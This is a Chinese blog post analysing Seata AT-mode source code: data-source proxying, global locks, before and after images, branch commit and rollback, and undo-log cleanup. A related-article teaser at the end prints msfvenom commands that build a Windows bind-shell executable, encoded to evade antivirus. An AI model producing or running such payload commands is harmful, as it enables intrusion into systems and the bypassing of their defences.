Seata AT模式下的源码解析(二)

news2025/1/10 23:42:12

6. 一阶段

在一阶段的调用流程是

请添加图片描述

6.1 DataSource

Seata最重要的一个功能就是对 DataSource 进行了代理,在用户执行插入 sql 时会在插入之间根据 sql 构建一个前置镜像出来,如果出现异常了,就可以通过 undolog 日志里面的镜像语句进行回滚;

seata中代理对数据进行代理的方式以及调用联调大致如下,seata对 数据源、连接对象、预编译对象 都进行了代理,最后通过 ExecuteTemplate 对象来执行解析 sql创建镜像等操作

在这里插入图片描述

6.2 SeataAutoDataSourceProxyCreator

步骤跟上面扫描 @GloableTransactional 一样对 DataSource 数据源进行代理,代理对象为 SeataDataSourceProxy 类型,根据代理模式创建不同的实现类:

  • DataSourceProxy:AT模式
  • DataSourceProxyXA:XA模式
protected Object wrapIfNecessary(Object bean, String beanName, Object cacheKey) {
    // 只对 DataSource 进行代理
    if (!(bean instanceof DataSource)) {
        return bean;
    }
    if (!(bean instanceof SeataDataSourceProxy)) {
        //调用父类对 bean 进行代理
        Object enhancer = super.wrapIfNecessary(bean, beanName, cacheKey);
        //要么已经被代理了,要么是被排除了
        if (bean == enhancer) {
            return bean;
        }
        //否者构建代理对象
        DataSource origin = (DataSource) bean;
        SeataDataSourceProxy proxy = buildProxy(origin, dataSourceProxyMode);
        DataSourceProxyHolder.put(origin, proxy);
        return enhancer;
    }
    SeataDataSourceProxy proxy = (SeataDataSourceProxy) bean;
    DataSource origin = proxy.getTargetDataSource();
    Object originEnhancer = super.wrapIfNecessary(origin, beanName, cacheKey);
    if (origin == originEnhancer) {
        return origin;
    }
    DataSourceProxyHolder.put(origin, proxy);
    return originEnhancer;
}

6.3 SeataAutoDataSourceProxyAdvice

数据源通知类,通知类中没有做什么特别的事,就是判断了当前执行的方法在 DataSource 中是否也具有相同的方法,如果存在相同的方法,直接调用 代理类 就可以了

public Object invoke(MethodInvocation invocation) throws Throwable {
    // check whether current context is expected
    if (!inExpectedContext()) {
        return invocation.proceed();
    }
    //获取需要执行的方法
    Method method = invocation.getMethod();
    String name = method.getName();
    Class<?>[] parameterTypes = method.getParameterTypes();
    //获取到DataSource中是否具有当前方法,如果抛出异常那么直接执行本体方法
    Method declared;
    try {
        declared = DataSource.class.getDeclaredMethod(name, parameterTypes);
    } catch (NoSuchMethodException e) {
        return invocation.proceed();
    }
    //调用代理对象的方法
    DataSource origin = (DataSource) invocation.getThis();
    SeataDataSourceProxy proxy = DataSourceProxyHolder.get(origin);
    Object[] args = invocation.getArguments();
    return declared.invoke(proxy, args);
}

6.4 SeataDataSourceProxy

public interface SeataDataSourceProxy extends DataSource {

    /**
     * 获取到代理的源对象
     */
    DataSource getTargetDataSource();

    /**
     * 获取当前分支事务采用的模式
     */
    BranchType getBranchType();
}

在这里插入图片描述

6.5 DataSourceProxy

AT模式的数据源代理对象,通过 DataSource 的使用方式,一般是,先通过 getConnection() 获取到一个数据库的连接,然后通过 Connection 对象再创建一个 Statement 的对象来操作 sql 语句,所以这里我们可以先看 getConnection() 方法是如何实现的

getConnection()

直接创建了一个 ConnectionProxy 连接代理对象

public ConnectionProxy getConnection() throws SQLException {
    Connection targetConnection = targetDataSource.getConnection();
    return new ConnectionProxy(this, targetConnection);
}

6.6 ConnectionProxy

在这里插入图片描述

createStatement()

又对 Statement 对象创建了一个代理对象

public Statement createStatement() throws SQLException {
    Statement targetStatement = getTargetConnection().createStatement();
    return new StatementProxy(this, targetStatement);
}

commit()

1)写隔离实现机制

提交事务时,会先向 TC 注册一个全局锁,表名+行记录 构成的锁;Seata 中对于写隔离的实现就是采用全局锁实现,写的过程:

  • 一阶段本地事务提交前,申请全局锁,拿不到全局锁不能提交
  • 超出了限制将放弃拿锁,回滚本地事务,释放本地锁

例如:t1和t2 两个事务,t1将 1000 修改为 900,t1先拿到全局锁,提交本地事务释放了本地锁,然后t2拿到本地锁将900修改为800,但是t1全局锁还没有释放,t2拿不到全局锁就根据策略进行重试,这时t1收到了 TC 的回滚请求,t1开始根据undolog进行回滚,发现t2还持有本地锁,就会一直进行重试回滚,t2持有本地锁重试次数超过了限制,放弃提交开始回滚数据释放问题锁,t1拿到本地锁开始执行回滚任务;因为整个过程 全局锁 在 t1结束前一直是被 t1 持有,所以不会发生脏写的问题。

2)读隔离实现机制

在数据库本地事务隔离级别 读已提交(Read Committed) 或以上的基础上,Seata(AT 模式)的默认全局隔离级别是 读未提交(Read Uncommitted)

如果应用在特定场景下,必需要求全局的 读已提交 ,目前 Seata 的方式是通过 SELECT FOR UPDATE 语句的代理。

为什么要默认采用 读未提交

猜想:如果使用默认数据库的 可重复读,会出现的问题就是 t1开启事务修改1000 - 100 = 900但是本地事务还没有提交,t2查询的数据出来还是1000 - 100 = 900,t1拿到锁开始提交事务并且释放本地锁以及全局锁,而t2也开始提交事务,这时候 t1和t2 都将数据改成了900,就导致了数据异常

public void commit() throws SQLException {
    try {
        //采用重试机制,反复的获取锁
        lockRetryPolicy.execute(() -> {
            //执行提交任务
            doCommit();
            return null;
        });
    } catch (SQLException e) {
        //判断是否是自动提交 并且并没有被改变过
        if (targetConnection != null && !getAutoCommit() && !getContext().isAutoCommitChanged()) {
            rollback();
        }
        throw e;
    } catch (Exception e) {
        throw new SQLException(e);
    }
}

doCommit()

private void doCommit() throws SQLException {
    //查看是否存在全局事务的配置,如果存在全局事务需要注册当前分支
    if (context.inGlobalTransaction()) {
        //如果分支注册成功了,直接提交事务
        processGlobalTransactionCommit();
    } else if (context.isGlobalLockRequire()) {
        //如果不存在 XID 先去判断是否存在全局锁
        processLocalCommitWithGlobalLocks();
    } else {
        //提交事务
        targetConnection.commit();
    }
}

processGlobalTransactionCommit()

private void processGlobalTransactionCommit() throws SQLException {
    try {
        //向 TC 设置一个由 表名:id 组成的全局锁,返回一个 branchId
        register();
    } catch (TransactionException e) {
        //如果锁已经存在,那么构建一个锁冲突的异常 LockConflictException
        recognizeLockKeyConflictException(e, context.buildLockKeys());
    }
    try {
        //刷新undolog日志,提交事务
        UndoLogManagerFactory.getUndoLogManager(this.getDbType()).flushUndoLogs(this);
        targetConnection.commit();
    } catch (Throwable ex) {
        LOGGER.error("process connectionProxy commit error: {}", ex.getMessage(), ex);
        //上报异常事务状态
        report(false);
        throw new SQLException(ex);
    }
    if (IS_REPORT_SUCCESS_ENABLE) {
        report(true);
    }
    context.reset();
}

6.7 PreparedStatementProxy

在这里插入图片描述

PreparedStatementProxy 覆写的 execute() 方法并没有做什么事,直接通过 ExecuteTemplate 来执行的

@Override
public boolean execute() throws SQLException {
    //执行完之后,直接调用回调函数执行源sql
    return ExecuteTemplate.execute(this, (statement, args) -> statement.execute());
}

6.8 ExecuteTemplate

  • SQLRecognizerFactory : sql识别工厂,引的哪个包就使用哪个识别器,这里使用的是 druid的识别器
    • DruidSQLRecognizerFactoryImpl
    • AntlrMySQLRecognizerFactory
  • SQLRecognizer:sql识别器将对应的sql语句解析成不同的类型,下面是实现类,数据库不同实现的类型也不同

在这里插入图片描述

public static <T, S extends Statement> T execute(List<SQLRecognizer> sqlRecognizers,
                                                     StatementProxy<S> statementProxy,
                                                     StatementCallback<T, S> statementCallback,
                                                     Object... args) throws SQLException {
        //对其进行全局锁的检查
        if (!RootContext.requireGlobalLock() && BranchType.AT != RootContext.getBranchType()) {
            //如果没有全局锁的标识并且也不是AT模式,直接执行源sql
            return statementCallback.execute(statementProxy.getTargetStatement(), args);
        }
        //创建sql识别器
        String dbType = statementProxy.getConnectionProxy().getDbType();
        if (CollectionUtils.isEmpty(sqlRecognizers)) {
            /**
             *  根据sql识别器工厂创建对应的识别器来创建 SQLRecognizer 对象,目前提供了两个实现类
             *  DruidSQLRecognizerFactoryImpl 和 AntlrMySQLRecognizerFactory 两个子类进行识别,两个子类通过两个包进行引用
             */
            sqlRecognizers = SQLVisitorFactory.get(
                    statementProxy.getTargetSQL(),
                    dbType);
        }
        Executor<T> executor;
        /**
         * 根据对应的sql类型创建出对应的执行器
         * 默认:PlainExecutor
         * 插入:InsertExecutor (会根据数据库的类型进行创建,这里只是指定接口名称)
         * 修改:UpdateExecutor
         * 删除:DeleteExecutor
         * select for update:SelectForUpdateExecutor
         * insert_on_duplicate_update:MySQLInsertOrUpdateExecutor
         * 多个sql执行:MultiExecutor
         */
        if (CollectionUtils.isEmpty(sqlRecognizers)) {
            executor = new PlainExecutor<>(statementProxy, statementCallback);
        } else {
            if (sqlRecognizers.size() == 1) {
                SQLRecognizer sqlRecognizer = sqlRecognizers.get(0);
                switch (sqlRecognizer.getSQLType()) {
                    case INSERT:
                        executor = EnhancedServiceLoader.load(InsertExecutor.class, dbType,
                                    new Class[]{StatementProxy.class, StatementCallback.class, SQLRecognizer.class},
                                    new Object[]{statementProxy, statementCallback, sqlRecognizer});
                        break;
                    case UPDATE:
                        executor = new UpdateExecutor<>(statementProxy, statementCallback, sqlRecognizer);
                        break;
                    case DELETE:
                        executor = new DeleteExecutor<>(statementProxy, statementCallback, sqlRecognizer);
                        break;
                    case SELECT_FOR_UPDATE:
                        executor = new SelectForUpdateExecutor<>(statementProxy, statementCallback, sqlRecognizer);
                        break;
                    case INSERT_ON_DUPLICATE_UPDATE:
                        switch (dbType) {
                            case JdbcConstants.MYSQL:
                            case JdbcConstants.MARIADB:
                                executor =
                                    new MySQLInsertOrUpdateExecutor(statementProxy, statementCallback, sqlRecognizer);
                                break;
                            default:
                                throw new NotSupportYetException(dbType + " not support to INSERT_ON_DUPLICATE_UPDATE");
                        }
                        break;
                    default:
                        executor = new PlainExecutor<>(statementProxy, statementCallback);
                        break;
                }
            } else {
                executor = new MultiExecutor<>(statementProxy, statementCallback, sqlRecognizers);
            }
        }
        T rs;
        try {
            /**
             * 执行时默认时执行 PlainExecutor中的方法
             * 其他类型执行 BaseTransactionalExecutor 中的方法
             */
            rs = executor.execute(args);
        } catch (Throwable ex) {
            if (!(ex instanceof SQLException)) {
                // Turn other exception into SQLException
                ex = new SQLException(ex);
            }
            throw (SQLException) ex;
        }
        return rs;
    }

6.9 Executor

根据sql识别器,识别出sql的类型是 insert、update还是delete等类型,根据不同的类型创建不同的sql执行器

在这里插入图片描述

ExecuteTemplate 中对sql进行解析之后创建出不同类型的 Eexcutor 实现类,以 Insert sql为例子,解析出的类型是 MysqlInsertOrUpdateExecutor 该类型并没有实现 execute(args) 方法,往上找调用的方法在 BaseTrasactionalExecutor 类中

execute()

从上下文中获取了 XID 进行绑定

public T execute(Object... args) throws Throwable {
    //获取到 XID
    String xid = RootContext.getXID();
    if (xid != null) {
        //如果XID不为空的话绑定到当前获取的连接代理对象中,证明当前连接已经绑定了全局事务,如果后续连接来绑定新全局事务抛出异常
        statementProxy.getConnectionProxy().bind(xid);
    }
    //判断是否需要全局锁,这里根据方法是否打了 @GlobalLock注解,GlobalTransactionalInterceptor中会根据 @GlobalLock 和 @GlobalTransactional注解进行不同的处理,如果是事务这里应该是false
    statementProxy.getConnectionProxy().setGlobalLockRequire(RootContext.requireGlobalLock());
    //AbstractDMLBaseExecutor
    return doExecute(args);
}

doExecute()

public T doExecute(Object... args) throws Throwable {
    AbstractConnectionProxy connectionProxy = statementProxy.getConnectionProxy();
    //根据是否自动提交事务来进行区分执行的代码,如果是自动提交,那么需要把自动提交关闭,改成手动提交
    if (connectionProxy.getAutoCommit()) {
        return executeAutoCommitTrue(args);
    } else {
        //不需要提交留给二阶段通知提交时开始提交
        return executeAutoCommitFalse(args);
    }
}

executeAutoCommitFalse()

先根据sql语句构建出前置镜像 TableRecords ,然后执行sql语句,根据前置镜像的主键id构建出执行sql之后的查询sql语句,根据修改之后记录构建后置镜像

public class TableRecords implements java.io.Serializable {
    private static final long serialVersionUID = 4441667803166771721L;
	//表的元数据信息
    private transient TableMeta tableMeta;
	//表名称
    private String tableName;
	//每一行数据对应的记录,里面又包括了每个字段的key和value
    private List<Row> rows = new ArrayList<Row>();
}

在后续提交时会根据构建的 tableName:{主键值1},{主键值2}…{主键值N} 记录锁对行加上锁,防止其他事务进行修改

protected T executeAutoCommitFalse(Object[] args) throws Exception {
    if (!JdbcConstants.MYSQL.equalsIgnoreCase(getDbType()) && isMultiPk()) {
        throw new NotSupportYetException("multi pk only support mysql!");
    }
    //构建前置镜像
    TableRecords beforeImage = beforeImage();
    //执行sql语句
    T result = statementCallback.execute(statementProxy.getTargetStatement(), args);
    //获取到影响的行数
    int updateCount = statementProxy.getUpdateCount();
    if (updateCount > 0) {
        //构建后置镜像根据前置镜像的id查询出执行之后的sql记录
        TableRecords afterImage = afterImage(beforeImage);
        //构建undolog日志:构建锁,锁的结构是 表名:主键值1....{值键值n},并且将锁添加到 lockKeysBuffer 在执行提交事务时会根据前面的锁对表数据上锁
        prepareUndoLog(beforeImage, afterImage);
    }
    return result;
}

executeAutoCommitTrue()

这里需要注意一点的是 LockRetryPolicy 对象,这里用到的是 AbstractDMLBaseExecutor.LockRetryPolicy

  • AbstractDMLBaseExecutor.LockRetryPolicy:继承至 ConnectionProxy.LockRetryPolicy,覆写了 onException(),抛出了异常会进行回滚
  • ConnectionProxy.LockRetryPolicy :onException() 方法什么事都没有做
protected T executeAutoCommitTrue(Object[] args) throws Throwable {
    ConnectionProxy connectionProxy = statementProxy.getConnectionProxy();
    try {
        //改变是否自动提交
        connectionProxy.changeAutoCommit();
        //锁重试的机制,如果一直拿不到锁就执行回滚的任务
        return new LockRetryPolicy(connectionProxy).execute(() -> {
            //构建前后镜像undolog日志
            T result = executeAutoCommitFalse(args);
            //执行事务的提交,看上面 ConnectionProxy.commit()
            connectionProxy.commit();
            return result;
        });
    } catch (Exception e) {
        // when exception occur in finally,this exception will lost, so just print it here
        LOGGER.error("execute executeAutoCommitTrue error:{}", e.getMessage(), e);
        //根据配置中 在锁冲突时的重试回滚机制,默认是true
        if (!LockRetryPolicy.isLockRetryPolicyBranchRollbackOnConflict()) {
            connectionProxy.getTargetConnection().rollback();
        }
        throw e;
    } finally {
        //清除事务相关的属性
        connectionProxy.getContext().reset();
        //自动提交打开
        connectionProxy.setAutoCommit(true);
    }
}

7. 网络请求

http://t.csdn.cn/jZSs2

8. 二阶段

8.1 分支提交

在二阶段 TC 向 TM 发起分支提交的请求时,通过 BranchCommitRequest 构建请求体,前面在网络请求里面提到了 seata 中是如何对请求体进行处理的,下面代码是 处理器 调用到 AbstractRMHandler 的代码;对应的处理器是 RmBranchCommitProcessor

public AbstractResultMessage onRequest(AbstractMessage request, RpcContext context) {
        if (!(request instanceof AbstractTransactionRequestToRM)) {
            throw new IllegalArgumentException();
        }
        //设置当前类为handler处理器
        AbstractTransactionRequestToRM transactionRequest = (AbstractTransactionRequestToRM)request;
        transactionRequest.setRMInboundMessageHandler(this);
        //这里通过调用,会调用到 DefaultRMHandler.handle(BranchCommitRequest) 的方法中,然后再通过对应的模式来获取处理器执行
        return transactionRequest.handle(context);
    }

AbstractCallback 一个抽象的回调函数,实现了自定义的 Callback

  • onSuccess:成功之后回调
  • onTransactionException:出现事务异常的回调
  • onException:出现执行异常的回调
public BranchCommitResponse handle(BranchCommitRequest request) {
        //处理分支提交的请求
        BranchCommitResponse response = new BranchCommitResponse();
        //自定义的回调抽象类 AbstractCallback,其中实现了异常捕获的方法
        exceptionHandleTemplate(new AbstractCallback<BranchCommitRequest, BranchCommitResponse>() {
            @Override
            public void execute(BranchCommitRequest request, BranchCommitResponse response)
                throws TransactionException {
                //执行分支提交
                doBranchCommit(request, response);
            }
        }, request, response);
        return response;
    }

执行分支提交的代码比较简单,获取到对应模式的资源管理器,然后调用对应的方法,默认是AT模式,这里就获取的是 DataSourceManager

protected void doBranchCommit(BranchCommitRequest request, BranchCommitResponse response)
        throws TransactionException {
        //获取到对应的RM管理器,AT模式的执行器是 io.seata.rm.datasource.DataSourceManager.branchCommit() 开启一个异步的worker线程
        BranchStatus status = getResourceManager().branchCommit(request.getBranchType(), xid, branchId, resourceId,
            applicationData);
    .........
    }

可以看到下面源码中 DataSourceManager.brancheCommit() 方法就调用了一个异步工作线程,执行分支提交 ,里面将任务添加到一个队列中等待执行,执行的任务就是删除对应的的 undolog 逻辑比较简单,就不贴详细的源码了

public BranchStatus branchCommit(BranchType branchType, String xid, long branchId, String resourceId,
                                     String applicationData) throws TransactionException {
        return asyncWorker.branchCommit(xid, branchId, resourceId);
    }

8.2 分支回滚

对应处理器 RmBranchRollbackProcessor,前面的处理逻辑都一样,之后调用的分支回滚方法不一样,上面分支提交是 branchCommit(),而这里是调用 branchRollback()

public BranchStatus branchRollback(BranchType branchType, String xid, long branchId, String resourceId,
                                       String applicationData) throws TransactionException {
        //根据资源id,获取到对应的数据源代理
        DataSourceProxy dataSourceProxy = get(resourceId);
        if (dataSourceProxy == null) {
            throw new ShouldNeverHappenException(String.format("resource: %s not found",resourceId));
        }
        try {
            //根据db类型获取到undolog的管理器,这里的undo方法,调用的 io.seata.rm.datasource.undo.AbstractUndoLogManager.undo
            UndoLogManagerFactory.getUndoLogManager(dataSourceProxy.getDbType()).undo(dataSourceProxy, xid, branchId);
        } catch (TransactionException te) {
            //对应对应的异常码,设置对应的分支回滚状态
                new Object[]{branchType, xid, branchId, resourceId, applicationData, te.getMessage()});
            if (te.getCode() == TransactionExceptionCode.BranchRollbackFailed_Unretriable) {
                return BranchStatus.PhaseTwo_RollbackFailed_Unretryable;
            } else {
                return BranchStatus.PhaseTwo_RollbackFailed_Retryable;
            }
        }
        return BranchStatus.PhaseTwo_Rollbacked;
    }

io.seata.rm.datasource.undo.AbstractUndoLogManager#undo:

public void undo(DataSourceProxy dataSourceProxy, String xid, long branchId) throws TransactionException {
        Connection conn = null;
        ResultSet rs = null;
        PreparedStatement selectPST = null;
        boolean originalAutoCommit = true;
        for (; ; ) {
            try {
                //获取到真实的连接对象
                conn = dataSourceProxy.getPlainConnection();
                // The entire undo process should run in a local transaction.
                if (originalAutoCommit = conn.getAutoCommit()) {
                    //修改自动提交为手动提交
                    conn.setAutoCommit(false);
                }
                // 查询undo log日志出来
                selectPST = conn.prepareStatement(SELECT_UNDO_LOG_SQL);
                //设置分支id
                selectPST.setLong(1, branchId);
                //xid
                selectPST.setString(2, xid);
                //执行查询语句
                rs = selectPST.executeQuery();
                boolean exists = false;
                //遍历查询出来的数据
                while (rs.next()) {
                    exists = true;
                    //如果服务端发送了多次回滚请求,这里只需要确保回滚了正确状态的日志
                    int state = rs.getInt(ClientTableColumnsName.UNDO_LOG_LOG_STATUS);
                    if (!canUndo(state)) {
                        if (LOGGER.isInfoEnabled()) {
                            LOGGER.info("xid {} branch {}, ignore {} undo_log", xid, branchId, state);
                        }
                        return;
                    }
                    //解析出context字段
                    String contextString = rs.getString(ClientTableColumnsName.UNDO_LOG_CONTEXT);
                    //解析出context为map
                    Map<String, String> context = parseContext(contextString);
                    //回去到rollback_info信息
                    byte[] rollbackInfo = getRollbackInfo(rs);
                    //获取到解析器名称,按照解析器进行序列化,默认使用jackson
                    String serializer = context == null ? null : context.get(UndoLogConstants.SERIALIZER_KEY);
                    UndoLogParser parser = serializer == null ? UndoLogParserFactory.getInstance()
                        : UndoLogParserFactory.getInstance(serializer);
                    //解析出回滚日志对象
                    BranchUndoLog branchUndoLog = parser.decode(rollbackInfo);

                    try {
                        // 设置当前线程采用的解析器的名称
                        setCurrentSerializer(parser.getName());
                        //获取到undolog 前后镜像数据信息
                        List<SQLUndoLog> sqlUndoLogs = branchUndoLog.getSqlUndoLogs();
                        if (sqlUndoLogs.size() > 1) {
                            Collections.reverse(sqlUndoLogs);
                        }
                        //遍历sql
                        for (SQLUndoLog sqlUndoLog : sqlUndoLogs) {
                            //获取到表的元数据信息
                            TableMeta tableMeta = TableMetaCacheFactory.getTableMetaCache(dataSourceProxy.getDbType()).getTableMeta(
                                conn, sqlUndoLog.getTableName(), dataSourceProxy.getResourceId());
                            sqlUndoLog.setTableMeta(tableMeta);
                            //根据数据库类型以及sql类型获取到对应的 undo执行器
                            AbstractUndoExecutor undoExecutor = UndoExecutorFactory.getUndoExecutor(
                                dataSourceProxy.getDbType(), sqlUndoLog);
                            undoExecutor.executeOn(conn);
                        }
                    } finally {
                        // 移除当前线程的序列化器
                        removeCurrentSerializer();
                    }
                }
                //如果存在undolog日志,需要删除undolog日志,跟业务代码一起提交事务,需要保证 undolog和日志回滚sql的一致性
                if (exists) {
                    //删除undolog日志
                    deleteUndoLog(xid, branchId, conn);
                    //执行事务提交
                    conn.commit();
                } else {
                    //如果不存在undolog日志,说明视图提交出现了异常导致undolog日志没有被存储上,这里插入了一个 GlobalFinished 状态的日志防止视图被正确的提交了
                    insertUndoLogWithGlobalFinished(xid, branchId, UndoLogParserFactory.getInstance(), conn);
                    //执行事务提交
                    conn.commit();
                }
                return;
            } catch (SQLIntegrityConstraintViolationException e) {
                
            } catch (Throwable e) {
                //抛出了异常就执行undolog日志回滚
            } finally {
                //关闭各个流和管道
            }
        }
    }

方法中真正执行日志回滚的是 AbstractUndoExecutor 类型,这是一个抽象类,通过工厂方法进行创建,根据数据库类型以及 sql的类型 获取到对应的执行器

在这里插入图片描述

io.seata.rm.datasource.undo.AbstractUndoExecutor#executeOn:

executeOn 作为一个抽象类的公关方法,其中一些比较有特点的函数方法都交给子类实现,例如:buildUndoSQL(构建回滚的sql,如果是插入构建的回滚sql就是删除)、getUndoRows(获取到后置镜像的数据信息)

public void executeOn(Connection conn) throws SQLException {
        /**
         * 是否开启镜像数据的验证,如果开启了需要对后置镜像和当前数据进行数据的对比,如果不相同说明被其他事务改变需要根据对应的策略进行处理
         * 对比策略:
         *      前后镜像相比较是否一样,一样的就不需要执行后续了
         *      后镜与当前数据进行比较是否一样
         *          如果一样直接后续回滚
         *          如果不一样再判断前镜与当前数据是否一样,如果不一样说明出现了脏数据,如果一样就不需要执行后续了
         */
        if (IS_UNDO_DATA_VALIDATION_ENABLE && !dataValidationAndGoOn(conn)) {
            return;
        }
        PreparedStatement undoPST = null;
        try {
            //buildUndoSQL() 抽象方法用于子类进行实现,sql不同子类实现方法也不同;例如:insert,构建回滚函数就是delete函数删除对应的语句
            String undoSQL = buildUndoSQL();
            //根据前置镜像的sql构建出sql语句
            undoPST = conn.prepareStatement(undoSQL);
            //根据后置镜像的记录获取到对应需要的数据
            TableRecords undoRows = getUndoRows();
            for (Row undoRow : undoRows.getRows()) {
                ArrayList<Field> undoValues = new ArrayList<>();
                //获取到记录的主键值
                List<Field> pkValueList = getOrderedPkList(undoRows, undoRow, getDbType(conn));
                for (Field field : undoRow.getFields()) {
                    if (field.getKeyType() != KeyType.PRIMARY_KEY) {
                        undoValues.add(field);
                    }
                }
                //设置value
                undoPrepare(undoPST, undoValues, pkValueList);
                //执行sql语句
                undoPST.executeUpdate();
            }

        } 

    }

8.3 undolog删除

undolog日志的删除就比较简单了,调用处理 io.seata.rm.RMHandlerAT#handle 方法,通过undolog管理器删除执行,由 TC 指定删除对应的期限的 undolog日志,默认是删除过去 7 天的 3000条数据

io.seata.rm.RMHandlerAT#handle

public void handle(UndoLogDeleteRequest request) {
        String resourceId = request.getResourceId();
        DataSourceManager dataSourceManager = (DataSourceManager)getResourceManager();
        DataSourceProxy dataSourceProxy = dataSourceManager.get(resourceId);
        boolean hasUndoLogTable = undoLogTableExistRecord.computeIfAbsent(resourceId, id -> checkUndoLogTableExist(dataSourceProxy));
        //根据存储天数进行数据的删除
        Date division = getLogCreated(request.getSaveDays());
        //获取到undolog日志管理器
        UndoLogManager manager = getUndoLogManager(dataSourceProxy);
        try (Connection conn = getConnection(dataSourceProxy)) {
            if (conn == null) {
                LOGGER.warn("Failed to get connection to delete expired undo_log for {}", resourceId);
                return;
            }
            int deleteRows;
            do {
                //根据日期进行删除,默认 7 天之内的 3000条数据
                deleteRows = deleteUndoLog(manager, conn, division);
            } while (deleteRows == LIMIT_ROWS);
        } catch (Exception e) {
            // should never happen, deleteUndoLog method had catch all Exception
        }
    }

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/22856.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

[附源码]java毕业设计乡村振兴惠农推介系统

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

数字孪生解决方案-最新全套文件

数字孪生解决方案-最新全套文件一、建设背景二、建设思路三、建设方案四、获取 - 数字孪生全套最新解决方案合集一、建设背景 建立真实世界与虚拟世界的数据映射和数字展示&#xff0c;模拟对象在物理世界中的行为&#xff0c;实时监控物理对象的变化&#xff0c;反映物理世界…

存储设计——如何优化 ClickHouse 索引(一)

Keypoint ClickHouse 索引与其他 RDMS 区别稀疏主键索引及其构建ClickHouse 索引最佳实践 ClickHouse 的索引设计 Whole data: [---------------------------------------------]CounterID: [aaaaaaaaaaaaaaaaaabbbbcdeeeeeeeeeeeeefgggggggghhhhhhhhhiiiiiiiiiklll…

关于stm32的flash内存

关于stm32的flash操作&#xff0c;网上已经有很多详细的介绍了&#xff0c;这里只是总结一些告诫。 在使用flash存储数据的时候&#xff0c;对于新手来说&#xff0c;并不知道该把数据存在哪一个地址上&#xff0c;怕存到程序区域&#xff0c;或者越界。 关于这一点很容易搞清楚…

第三十五篇 Swiper 引入使用

对于Swiper来说&#xff0c;相信有很多人都有一定的理解&#xff0c;也有使用过swiper插件的&#xff0c;封装过类似的组件&#xff0c;Swiper的一个使用是非常广泛的&#xff0c;是开源免费、非常强大的一个触摸滑动组件&#xff0c;最典型的就是轮播图了&#xff1b;大家可以…

【机器学习技巧】回归模型的几个常用评估指标(R2、Adjusted-R2、MSE、RMSE、MAE、MAPE)及其在sklearn中的调用方式

目录回归模型评估的两个方面1. 预测值的拟合程度2. 预测值的准确度以糖尿病数据集的回归模型为计算示例-计算各指标1. 决定系数R21.1 R2求解方式一----从metrics调用r2_socre1.2 R2求解方式二----从模型调用score1.3 R2求解方式二----交叉验证调用scoringr22. 校准决定系数Adju…

【Linux】第十三章 多线程(线程互斥+线程安全和可重入+死锁+线程同步)

&#x1f3c6;个人主页&#xff1a;企鹅不叫的博客 ​ &#x1f308;专栏 C语言初阶和进阶C项目Leetcode刷题初阶数据结构与算法C初阶和进阶《深入理解计算机操作系统》《高质量C/C编程》Linux ⭐️ 博主码云gitee链接&#xff1a;代码仓库地址 ⚡若有帮助可以【关注点赞收藏】…

第四章 使用Vitepress搭建文档网站

第四章 使用Vitepress搭建文档网站 文档建设一般会是一个静态网站的形式 &#xff0c;这次采用 Vitepress 完成文档建设工作。 Vitepress 是一款基于Vite 的静态站点生成工具。开发的初衷就是为了建设 Vue 的文档。Vitepress 的方便之处在于&#xff0c;可以使用流行的 Markd…

交换综合实验以及链路聚合和VRRP

1. MSTP针对RSTP做了哪些改进&#xff1f;请详细说明 在划分VLAN的网络中运行RSTP/STP。局域网内的所有VLAN共享一棵生成树&#xff0c;被阻塞后的链路将不再承载任何流量。无法在VLAN间实现数据流量的负载均衡&#xff1b;导致带宽利用率、设备资源利用率较低 &#xff08;1&…

基于KPCA 和 STFT 非侵入式负荷监控(Matlab代码实现)

&#x1f468;‍&#x1f393;个人主页&#xff1a;研学社的博客 &#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;欢迎来到本博客❤️❤️&#x1f4a5;&#x1f4a5; &#x1f3c6;博主优势&#xff1a;&#x1f31e;&#x1f31e;&#x1f31e;博客内容尽量做到思维缜…

免杀技术实际演示

生成反弹shell msfvenom -p windows/shell/bind_tcp lhost1.1.1.1 lport4444 -a x86 --platform win -f exe -o a.exe加密编码反弹shell msfvenom -p windows/shell/bind_tcp lhost1.1.1.1 lport4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows…

String的compareTo()方法使用场景介绍及全量ASCII 码表(完整版)

String的compareTo方法使用场景介绍及全量ASCII 码表&#xff08;完整版&#xff09;一、介绍二、compareTo()使用场景场景一&#xff1a;数值型字符串比较场景二&#xff1a;排序比较场景三&#xff1a;对相同结构的日期比较三、源码分析四、全量ASCII 码表&#xff08;完整版…

[前端基础] JavaScript 基础篇(上)

JavaScript的标准是 ECMAScript 。截至 2012 年&#xff0c;所有浏览器都完整的支持ECMAScript 5.1&#xff0c;旧版本的浏览器至少支持 ECMAScript 3 标准。2015年6月17日&#xff0c;ECMA国际组织发布了 ECMAScript 的第六版&#xff0c;该版本正式名称为 ECMAScript 2015&am…

steam搬砖项目全面讲解,月入8000+

哈喽大家好&#xff0c;我是阿阳 今天给大家分享CSGO搬砖项目&#xff0c;这个是最为稳定利润可观的项目&#xff0c;一个月净赚3万 阿阳网络创始人&#xff0c;8年互联网项目实战经验&#xff0c;个人ip打造【玩赚steam&#xff0c;3年买2套房】国外steam游戏搬砖&#xff08…

[附源码]java毕业设计文档管理系统

项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM mybatis Maven Vue 等等组成&#xff0c;B/S模式 M…

Java中Callable和Future

Java中为什么需要Callable 在java中有两种创建线程的方法&#xff1a; 一种是继承Thread类&#xff0c;重写run方法&#xff1a; public class TestMain {public static void main(String[] args) {MyThread t1 new MyThread();t1.start();} } class MyThread extends Thre…

值得学习的Linux内核锁(一)

